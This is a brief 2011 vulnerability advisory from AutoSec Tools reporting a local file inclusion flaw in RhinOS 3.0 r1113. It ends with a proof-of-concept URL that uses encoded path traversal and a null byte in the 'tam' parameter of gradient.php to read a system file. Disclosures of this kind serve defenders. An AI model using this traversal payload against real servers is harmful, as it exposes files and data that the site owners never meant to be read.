A local file inclusion vulnerability in RhinOS version 3.0 r1113 can be exploited to include arbitrary files.
bcc19e8bcde268d1b97b09028f2628b57932f61a71d1efe5bf2eab1b92cf86c5
------------------------------------------------------------------------
Software................RhinOS 3.0 r1113
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.saltos.net/portal/es/rhinos.htm
Release Date............3/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
........................Bryce Darling <bryce@autosectools.com>
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in RhinOS 3.0 r1113 can be
exploited to include arbitrary files.
--PoC--
http://localhost/rhinos-es-3.0/admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00